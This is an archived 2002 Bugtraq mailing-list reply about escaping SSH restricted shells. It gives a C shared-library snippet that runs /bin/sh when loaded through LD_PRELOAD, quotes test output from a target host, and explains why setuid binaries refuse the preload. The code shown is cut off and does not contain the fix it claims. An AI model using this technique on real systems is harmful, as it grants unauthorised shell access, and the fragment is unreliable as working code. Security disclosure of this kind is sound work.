Re: ssh environment - circumvention of restricted shells

From: ari (edelkind-bugtraqat_private)
Date: Wed Jun 26 2002 - 21:54:53 PDT

  • Next message: Joost Pol: "CERT VU #803539"

    lsawyerat_private said this stuff:
    > I've tried this 'exploit' on both Linux 2.4.14 (redhat) and Solaris 2.8
    > boxen, and have been unable to get a shell.  The shell process is there,
    > but fails to communicate with the network socket.  
    Ah; /bin/sh is shared on your system as well.  To get around this, try
    the following code for
    #include <unistd.h>
    #include <stdlib.h>
    void _init (void) {
    	execl("/bin/sh", "sh", 0);
    > *** However ***, if i replace "/bin/sh" with "ping some.ip.add.ress"  and
    > attempt the connection, i'm greeted with the following:
    > 	Last login: today from somehost
    > 	Sun Microsystems Inc.  SunOS 5.8
    > ping: warning: /homes/evil/.ssh/ open failed:
    > illegal insecure pathname
    > 	some.ip.add.ress is alive
    > 	Connection to target closed.
    Your 'ping' binary is probably setuid-root.  What happens is, the shared
    library executes ping, but the LD_PRELOAD environment variable hasn't
    gone anywhere.  When ping executes, sees LD_PRELOAD (which is
    forbidden for setuid programs), complains, and doesn't execute it.
    On the other hand, when executing your shared /bin/sh, every /bin/sh
    process once again preloads, creating an infinite execl(3) loop.
    The code above should account for that.

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